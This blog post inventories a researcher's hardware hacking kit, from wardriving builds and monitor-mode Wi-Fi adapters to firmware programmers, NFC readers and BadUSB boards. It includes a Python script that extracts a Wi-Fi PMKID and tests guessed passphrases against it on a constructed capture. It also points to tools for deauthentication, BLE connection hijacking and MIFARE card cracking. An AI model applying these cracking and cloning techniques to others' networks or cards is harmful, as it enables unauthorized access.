Hardware Hacking and Research Toolbox Inventory

May 05, 2024 security inventory hacking toolbox 16 minutes to read

Inspired by the blog post My Red Team assessment hardware by David Sopas, this post describes the hardware tools I have in my inventory, their purpose, and the features/firmwares/tricks that motivated me to buy them. This is not intended to be an exhaustively detailed list, but I will try to give some rationale and use-cases for each of the tools, as well as categorize them.

Do-it-yourself projects (partial or complete) are marked with the tag [DIY]. URLs point either to the repositories, official websites, technical references, or online sellers. If you find a broken URL please contact me; otherwise you can still find the tools by searching for their names with any search engine.

None of the links to online stores are sponsored in any way and should only be used as a reference.

Wi-Fi, Bluetooth and other radios

  1. [DIY] Wardriver.uk by Joseph Hewitt

For wardriving[1] purposes (2.4 GHz Wi-Fi networks and Bluetooth devices) I have built a wardriver.uk, based on the very detailed and nicely explained project by Joseph Hewitt, which outputs WiGLE-compatible CSV files. You will need two ESP32 modules (ESP32-DevKitC V4 with ESP32-WROOM-32U is recommended), a GPS module, a SIM800L GSM module, an I2C LCD, a DS18B20 temperature sensor, and an SPI micro SD card reader/writer. I wired the first version on protoboards, then ordered the PCB designed by the author. You can order the PCBs from the author if you want to support the project.

  2. [DIY] io433 by kripthor

IO433 is an ESP32 (TTGO T-Display) and CC1101 based 433 MHz sniffer and replayer for ASK/OOK signals. Building instructions are available in the project repository, as are the firmware and the Gerber files for the PCB (although I built mine on a generic protoboard). It is a nice tool for playing around with 433 MHz devices such as cheap weather sensors, doorbells, and the like; keep in mind that a plain replay only works against receivers that use fixed codes, which is exactly why those cheap devices are the interesting targets.

  3. Zsun Wi-Fi card reader

    Zsun is an Atheros AR9331 based wireless card reader with 64 MiB of RAM and 16 MiB of SPI flash. The specs are enough to run OpenWrt, which turns the device into a tiny wireless AP / client / repeater.

  4. GL-MT300N-V2 Mini Smart Router

    A small and cheap travel router that runs OpenWrt (128 MB RAM, 16 MB flash), with two RJ45 Ethernet ports, micro-USB power, a UART and some GPIOs available. It also has a nice physical VPN switch and an easily clickable reset button (ideal to start over when you fail to configure OpenWrt properly).

  5. [DIY] Throwing Star LAN Tap

    Throwing Star LAN Tap is a passive Ethernet tap (read-only monitoring via the J3 and J4 ports) for 10BASE-T and 100BASE-TX networks. You can build one by having the PCB made and soldering a few capacitors and RJ45 jacks (instructions available), or you can buy it ready to use. Two things to keep in mind when using it: each monitoring port only carries one direction of the traffic, so you need two capture interfaces (and a tool such as mergecap) to reconstruct the full conversation, and a gigabit link passing through the tap will negotiate down to 100 Mbit/s, since a passive tap cannot handle 1000BASE-T.

  6. TP-Link TL-WN722N V2.0

    The good old and cheap 2.4 GHz Wi-Fi dongle that lets you enable monitor mode[2] for Wi-Fi mischief. It is usually recommended to get the V1 version because it works out of the box (Atheros AR9271, supported by the in-kernel ath9k_htc driver); the later revisions (V2/V3) use a Realtek RTL8188EUS and need an out-of-tree driver, but you can also make them work.

  7. RTL8812au-based dual-band AC1200 WiFi adapter

    An RTL8812AU-based dual-band Wi-Fi adapter similar to the Alfa Networks AWUS036ACH (it uses the same chipset). This chipset supports monitor mode[2] on both the 2.4 GHz and 5 GHz bands, which makes it ideal for offensive Wi-Fi adventures. It relies on an out-of-tree driver (the aircrack-ng rtl8812au fork is the usual choice), so check that it builds against your kernel before you count on it in the field.

  8. Nooelec NESDR SMArTee v2

    A cheap and reliable SDR with an RTL2832U demodulator/USB interface IC and an R820T2 tuner IC. The SMArTee variant has an always-on bias tee, so it can power an active antenna or an LNA over the coax. I advise buying a bundle with some antennas, which lets you do some nice experiments out of the box.
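    The wardriver.uk build listed first in this section writes WiGLE-format CSV files, and the first thing I want from a wardrive is a quick triage of which networks are open or still on WEP. The script below is an added example of that triage; it is not part of the wardriver.uk project. It assumes the WiGLE CSV 1.4 layout (one preamble line starting with "WigleWifi", then a header row of MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type), and the sample file embedded in it is constructed, not a real capture.

```python
"""Triage a WiGLE-format CSV from a wardrive: dedupe BSSIDs, classify security, list weak networks.

Added example, not code from the wardriver.uk project. Assumes the WiGLE CSV 1.4
layout; SAMPLE_CSV is constructed for illustration.
"""
import csv
import io
from collections import Counter

# Constructed sample: a preamble line, the WiGLE header, then a few observations.
# The same BSSID (…:77) appears twice to show that the strongest reading is kept,
# and the BLE row shows that non-Wi-Fi rows are ignored.
SAMPLE_CSV = """\
WigleWifi-1.4,appRelease=1.0,model=wardriver.uk,release=1,device=esp32,display=lcd,board=esp32,brand=wardriver
MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type
00:11:22:33:44:55,CoffeeShop,[ESS],2024-05-05 10:00:00,6,-55,51.5000,-0.1200,10,5,WIFI
00:11:22:33:44:66,LegacyCam,[WEP][ESS],2024-05-05 10:00:02,11,-70,51.5001,-0.1201,10,5,WIFI
00:11:22:33:44:77,HomeNet,[WPA2-PSK-CCMP][ESS],2024-05-05 10:00:03,1,-60,51.5002,-0.1202,10,5,WIFI
00:11:22:33:44:77,HomeNet,[WPA2-PSK-CCMP][ESS],2024-05-05 10:05:03,1,-50,51.5003,-0.1203,10,5,WIFI
00:11:22:33:44:99,NewRouter,[WPA2-PSK-CCMP][WPA3-SAE-CCMP][ESS],2024-05-05 10:00:04,36,-65,51.5004,-0.1204,10,5,WIFI
aa:bb:cc:dd:ee:ff,Fitness Tracker,Misc [BLE],2024-05-05 10:00:05,0,-80,51.5005,-0.1205,10,5,BLE
"""


def classify_auth(authmode: str) -> str:
    """Map a WiGLE AuthMode string to the strongest security the AP advertises."""
    a = authmode.upper()
    if "WPA3" in a or "SAE" in a:
        return "WPA3"
    if "WPA2" in a or "RSN" in a:
        return "WPA2"
    if "WPA" in a:
        return "WPA"
    if "WEP" in a:
        return "WEP"
    return "OPEN"  # only [ESS] (or nothing) present: no encryption advertised


def parse_wigle(text: str) -> dict:
    """Return {bssid: info} for Wi-Fi rows, keeping the strongest observation per BSSID."""
    lines = text.splitlines()
    if not lines or not lines[0].startswith("WigleWifi"):
        raise ValueError("not a WiGLE CSV: missing preamble line")
    reader = csv.DictReader(io.StringIO("\n".join(lines[1:])))
    seen = {}
    for row in reader:
        if row.get("Type", "WIFI") != "WIFI":
            continue  # Bluetooth / BLE rows are not access points
        mac = row["MAC"].lower()
        rssi = int(row["RSSI"])
        if mac not in seen or rssi > seen[mac]["rssi"]:
            seen[mac] = {
                "ssid": row["SSID"],
                "security": classify_auth(row["AuthMode"]),
                "rssi": rssi,
                "channel": int(row["Channel"]),
                "lat": float(row["CurrentLatitude"]),
                "lon": float(row["CurrentLongitude"]),
            }
    return seen


def summarize(networks: dict) -> Counter:
    """Count unique BSSIDs per security class."""
    return Counter(n["security"] for n in networks.values())


def weak_networks(networks: dict) -> list:
    """Open and WEP networks, sorted by BSSID, as (bssid, ssid, security)."""
    return sorted(
        (mac, n["ssid"], n["security"])
        for mac, n in networks.items()
        if n["security"] in ("OPEN", "WEP")
    )


if __name__ == "__main__":
    nets = parse_wigle(SAMPLE_CSV)
    print(dict(summarize(nets)))
    for mac, ssid, sec in weak_networks(nets):
        print(f"{sec:5s} {mac} {ssid!r}")
```

    Feeding it a real wardriver.uk file is a matter of reading the file into `parse_wigle`; the position columns are kept in the result so the weak networks can be plotted or handed back to WiGLE.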

Device inspection (debug tools and programmers)

  1. FT232 USB for TTL Serial Adapter for 3.3V and 5V

    An FT232-based USB-to-UART board is the go-to solution for talking to serial consoles. Different models have similar features. I carry two, one older model with a mini-USB connector and another with a USB-A connector, always together with a bunch of jumper wires. Before connecting it to a target, check the position of the 3.3V/5V jumper (a 3.3V UART can be damaged by 5V levels; when in doubt, measure the target's logic level with a multimeter first) and remember that RX and TX are crossed: adapter TX goes to target RX.

  2. USBASP 2.0 based on ATmega8A

    USBasp is a USB in-circuit programmer for Atmel AVR microcontrollers, which are commonly found in smart devices and other controllers. The firmware is provided by Thomas Fischl, who has other cool projects. It is driven with avrdude (-c usbasp), which besides flashing can read back the flash, EEPROM and fuse bytes, handy to check whether a device's lock bits prevent readout.

  3. Dongle ST-LINK V2 STM8 STM32

    An ST-LINK V2 compatible programmer/debugger dongle supporting both the STM8 (via SWIM) and STM32 (via SWD) microcontroller families, which, like Arduino boards, are widely used in smart appliances. With OpenOCD or stlink-tools it can dump the firmware of an STM32 target whose readout protection (RDP) is not enabled.

  4. YS-IRTM 5V NEC Infrared UART transceiver

    It consists of a 38 kHz / 940 nm infrared (IR) LED transmitter and receiver pair plus a microcontroller that exposes them over a UART interface. It cannot be used directly via USB, so it is recommended to connect it through a generic microcontroller (or a USB-to-UART adapter). You can use the following as a reference.

  5. ELM327 V1.5 OBD2 Bluetooth Scanner and Diagnostic Tool

    A generic OBD-II reader that works with many car models and brands. Mostly unused in my case as I have not delved into car hacking, but for beginners like me I do recommend a workshop just to understand the “world”: Remoticon 2020 // Learn How to Hack a Car Workshop

  6. CH341A USB Programmer with Adapters

    The CH341A USB programmer supports most 24-series (I2C EEPROM) and 25-series (SPI flash) chips in SOP8 packages, the ones commonly used for BIOS/UEFI storage, and can be used to back up, erase and program them (flashrom drives it with -p ch341a_spi). I have successfully used it in the past to recover laptops from corrupted BIOS issues. I also 3D printed a yellow case for it. Two practical caveats: the cheap black boards are known to drive the data lines at 5V, which is out of spec for the 3.3V flash chips found on most boards (some revisions need a small hardware fix), and a chip should always be dumped twice and the two dumps compared before you trust a backup or write anything back.

  7. USB Logic Analyzer 24MHz 8 Channels

    A generic low-budget logic analyzer with 8 channels that, theoretically, can sample at up to 24 MHz (in practice less). It is good enough for most low-baud-rate analysis, but can struggle with the higher baud rates that are becoming common; as a rule of thumb you want to sample at least four times faster than the signal you are decoding. Nonetheless a good tool to keep around, especially if you don't want to invest in a Saleae. It is also compatible with the Saleae Logic 2 software and, theoretically, with sigrok (these clones are Cypress FX2 boards handled by the fx2lafw driver), but I didn't manage to get my unit working correctly with it.

  8. [DIY] Logic probe

    A simple and quick-to-use probe that you can build (several kits are available), useful for probing circuits when you do not have a multimeter or logic analyzer at hand. You connect it to a reference voltage source and GND, touch the tip to the signal, and the three LEDs tell the rest:

    • red only: logic 0
    • yellow only: floating
    • green only: logic 1
    • all LEDs: an oscillating signal

  9. UNI-T UT139C Multimeter

    A good multimeter is always a good investment (but you still don't need the most expensive ones). Beyond the trivial ones, the features I find most useful are the frequency and temperature (℃/℉) readings, plus a continuity beeper for tracing connections on a PCB.

Smart cards

  1. SIM card converter to Smartcard IC

    A SIM card to full-size smartcard (ID-1) adapter and extension, supporting standard, micro and nano SIM cards, so that a SIM can be inserted into a regular smartcard reader.

  2. PN532 NFC RFID IC Card Reader Module 13.56MHz with USB Port

    A libnfc-compatible board that can be used to read from and write to NFC cards, including MIFARE Classic cards. You can also keep some blank UID-writable (“magic”) cards around for cloning. There is a good blog post by Christian Mehlmauer on how to use libnfc to crack MIFARE Classic cards, and How to hack Mifare Classic NFC cards by lp1.

  3. Generic Magstripe Reader

    A cheap and generic magnetic stripe reader that can be used for research and cool projects such as magspoof.

Generic boards

  1. Raspberry Pi Zero W with USB A add-on

    A Raspberry Pi Zero W is a full computer on a stick, capable of running several Linux distros (no more intro needed). The USB-A add-on board allows it to be plugged into any USB port and, more than that, to act as a USB mass-storage device or even as a BadUSB[3] with P4wnP1 A.L.O.A., which gives the Pi plug-and-play USB device emulation, HIDScript, and Bluetooth and Wi-Fi offensive tooling. Another use-case is the well-known Pwnagotchi for collecting WPA handshakes, either through passive sniffing or by performing deauthentication and association attacks.

  2. nRF52840 Dongle

    The nRF52840 Dongle is a small USB dongle that supports Bluetooth 5.4, Bluetooth mesh, Thread, Zigbee, 802.15.4, ANT and 2.4 GHz proprietary protocols. It is useful for probing these protocols, and is well known for the ability to easily eavesdrop on Bluetooth Low Energy communications and perform multiple active attacks based on the InjectaBLE strategy. It can also work as a FIDO2 security key using Google OpenSK.

  3. M5Stack Core

    An ESP32-based (Bluetooth + Wi-Fi) developer board in a really nice package, with built-in battery, three physical buttons and a 320×240 IPS screen. One cool use-case is the ESP32 WiFi Hash Monster, which captures EAPOL handshakes and PMKIDs to an SD card for further (offline) analysis. Another is MarauderCentauri, a set of Wi-Fi/Bluetooth offensive and defensive tools; you can also buy the full-fledged custom hardware at the justcallmekoko store.

  4. DigiSpark Attiny85

    A tiny microcontroller board with a USB-A plug that can be used as a BadUSB[3]. It is so cheap that it is good for plug-and-leave situations. A good tutorial by Baud is available on 0x00sec.

  5. Micro:bit

    With three units you can sniff all three Bluetooth LE advertising channels at once, and with Btlejack you can sniff, jam and hijack connections.

  6. Wemos D1 mini / ESP8266, Raspberry Pi Pico, Arduino Nano

    Some of the boards that I typically carry around, some with pin headers soldered, others not.
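    The M5Stack item above mentions dumping EAPOL/PMKID captures to an SD card "for further analysis". The script below is an added example of what that analysis looks like, written here for this post rather than taken from the WiFi Hash Monster or M5Stack projects: it parses an EAPOL-Key message 1, pulls the PMKID out of the Key Data, emits the hashcat 22000 line (WPA*01*PMKID*MAC_AP*MAC_STA*ESSID***) and checks candidate passphrases against the PMKID using the PBKDF2 and HMAC-SHA1 definitions from IEEE 802.11. The frame it parses is constructed inside the script (SSID, MACs and the passphrase "correct horse" are made up), so the result is known in advance; a real capture would be read from the SD card instead.

```python
"""Extract a PMKID from a captured EAPOL-Key message 1 and test passphrases against it.

Added example, not code from the WiFi Hash Monster project. The EAPOL frame is
constructed below (SSID "HomeNet", made-up MACs, passphrase "correct horse").
Frame layout follows IEEE 802.1X / 802.11 (RSN key descriptor); the output line
follows the hashcat 22000 PMKID format.
"""
import hashlib
import hmac
import struct

PMKID_KDE_HEADER = b"\x00\x0f\xac\x04"  # OUI 00-0f-ac, data type 4 = PMKID


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_key_msg1(pmkid: bytes) -> bytes:
    """Constructed EAPOL-Key message 1: 802.1X header + RSN key descriptor + PMKID KDE."""
    kde = b"\xdd" + bytes([4 + len(pmkid)]) + PMKID_KDE_HEADER + pmkid
    descriptor = struct.pack(
        ">BHH8s32s16s8s8s16sH",
        2,             # descriptor type 2 = RSN
        0x008A,        # key info: Pairwise | Ack, descriptor version 2 (message 1)
        16,            # key length
        b"\x00" * 8,   # replay counter
        b"\x11" * 32,  # ANonce (dummy value)
        b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,  # Key IV, Key RSC, Key ID
        b"\x00" * 16,  # MIC is zero in message 1
        len(kde),
    ) + kde
    return struct.pack(">BBH", 2, 3, len(descriptor)) + descriptor  # 802.1X v2, type 3 = EAPOL-Key


def extract_pmkid(eapol: bytes):
    """Walk the Key Data KDEs of an EAPOL-Key frame and return the PMKID, or None if absent."""
    _version, ptype, length = struct.unpack(">BBH", eapol[:4])
    if ptype != 3:
        raise ValueError("not an EAPOL-Key frame")
    body = eapol[4:4 + length]
    if body[0] != 2:
        raise ValueError("not an RSN key descriptor")
    key_info = struct.unpack(">H", body[1:3])[0]
    if key_info & 0x1000:
        raise ValueError("key data is encrypted, so this is not message 1")
    # 1 type + 2 info + 2 len + 8 replay + 32 nonce + 16 IV + 8 RSC + 8 ID + 16 MIC = 93 bytes
    key_data_len = struct.unpack(">H", body[93:95])[0]
    key_data = body[95:95 + key_data_len]
    i = 0
    while i + 2 <= len(key_data):
        tag, ln = key_data[i], key_data[i + 1]
        if tag == 0xDD and ln >= 20 and key_data[i + 2:i + 6] == PMKID_KDE_HEADER:
            return key_data[i + 6:i + 22]
        i += 2 + ln
    return None  # the AP did not include a PMKID; fall back to the full 4-way handshake


def hashcat_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat -m 22000 input line for a PMKID (ANONCE/EAPOL/MESSAGEPAIR fields left empty)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def check_passphrase(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes, target_pmkid: bytes) -> bool:
    """True if the candidate passphrase reproduces the captured PMKID."""
    guess = compute_pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
    return hmac.compare_digest(guess, target_pmkid)


# Constructed capture: message 1 from AP 00:11:22:33:44:77 to station aa:bb:cc:dd:ee:ff.
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334477")
STA_MAC = bytes.fromhex("aabbccddeeff")
SAMPLE_FRAME = build_eapol_key_msg1(
    compute_pmkid(pmk_from_passphrase("correct horse", SSID), AP_MAC, STA_MAC)
)

if __name__ == "__main__":
    pmkid = extract_pmkid(SAMPLE_FRAME)
    print(hashcat_22000_line(pmkid, AP_MAC, STA_MAC, SSID))
    for word in ("password", "wrong horse", "correct horse"):
        print(f"{word!r}: {check_passphrase(word, SSID, AP_MAC, STA_MAC, pmkid)}")
```

    The per-candidate cost is one PBKDF2 run (4096 HMAC-SHA1 iterations), which is why the real cracking is left to hashcat on a GPU; the Python check is there to show exactly what hashcat computes. Note that not every access point puts a PMKID in message 1, in which case you need the full four-way handshake instead.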

Screwdrivers, Lockpick and others

  1. Mi x Wiha Precision Screwdriver (manual)

    A generic precision screwdriver kit supporting most types of screw heads. Compact in size, which is ideal for carrying in a backpack.

  2. 4-Way Multi-Functional Utilities Key

  3. Generic Lockpick set with Practice locks

  4. Multi-tool

    A multi-tool is always nice to have, and while I don’t recommend any specific one (any Leatherman or Gerber should be more than enough), whichever you buy should have, at least: (1) pliers, (2) a sharp-enough cutting blade / knife, (3) a large bit driver, and (4) a bottle opener!

Random

  1. 1Life usb:hub 3 with RTL8153 Gigabit Ethernet Adapter

    A generic USB hub with a Gigabit Ethernet adapter (based on the RTL8153) is a must-have for when you have few USB ports or no RJ45 port. It is also useful if you want to connect to more than one physical network at the same time.

  2. Rii Wireless Mini X1 with Touchpad - 2.4GHz - QWERTY

    An all-around wireless keyboard which is useful for a range of scenarios, e.g., configuring Raspberry Pi’s.

  3. [DIY] Small IC Test Clips, Pogo pin clamps and PCB Workstation with Needle-Probes

    Useful when probing PCBs and connecting to debug ports / test points. I totally recommend the 3D-printed PCB workstation, as it works for most PCBs and smallish traces and connections.

  4. Generic USB Multimeter

    Useful to troubleshoot USB connections (voltage and current). More recent models (e.g., UM25C) also allow monitoring over Bluetooth.

  5. Large assortment of cables and adapters

    There is no such thing as too many cables, as there is no such thing as too many adapters. A few that I recommend to have always around:

    • USB: A->C, C->A, C<->C, A->micro, A->nano, USB OTG, A<->Lightning
    • Video: HDMI<->HDMI, HDMI<->mini HDMI, VGA<->HDMI
    • RJ45
    • Assortment of jumpers (male->female, male<->male, female<->female)
    • MicroSD to SD adapter and SD card reader
  6. Generic USB LED lamp (useful for low-light situation)

  7. Assortment of USB Pens

    This remains one of the things I use the most (from live boots to installing new OSes). You do not need the fancy ones with USB-C and such if you keep some adapters at hand. Ventoy is a nice tool to keep several ISOs on the same drive and boot from them when needed. I also keep some Linux live USBs (with something such as Debian Stable) and Clonezilla.

  8. Powerbank (at least 10000mAh)

  9. Laptop

    I left this to the end on purpose. Most probably you are thinking of a high-performance laptop. While that would be nice, in most cases a cheap, second-hand ThinkPad (or any other reliable brand) will suffice. I now have a ThinkPad Y370 (~250€) and a ThinkPad X240 (~200€), and the only thing that will really bother you is RAM if you have less than 8 GB of it. Other than that, just use the cloud: Google's hosted Python notebooks are nice, but there are also several cheap VPS machines that you can rent or use for free (riding on free credits) if needed.

  10. Backpack and bags

    All this stuff needs to be carried (hopefully not everything at once). For that I recommend any rucksack-like backpack such as this one. I would not recommend the military-grade ones, especially if you don’t want unnecessary attention (e.g., at airports). Also, some small bags with compartments are useful, such as this one or this one. And always carry a roll of velcro (that you can cut to size), which is always useful to tie things together.

Footnotes

  1. Wardriving is the act of searching for Wi-Fi wireless networks as well as cell towers, usually from a moving vehicle, using a laptop or smartphone. (Wikipedia)

  2. Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first. (Wikipedia)

  3. A USB device whose firmware lets it present itself as a human interface device (USB HID), such as a keyboard, and thus inject payloads via keystrokes.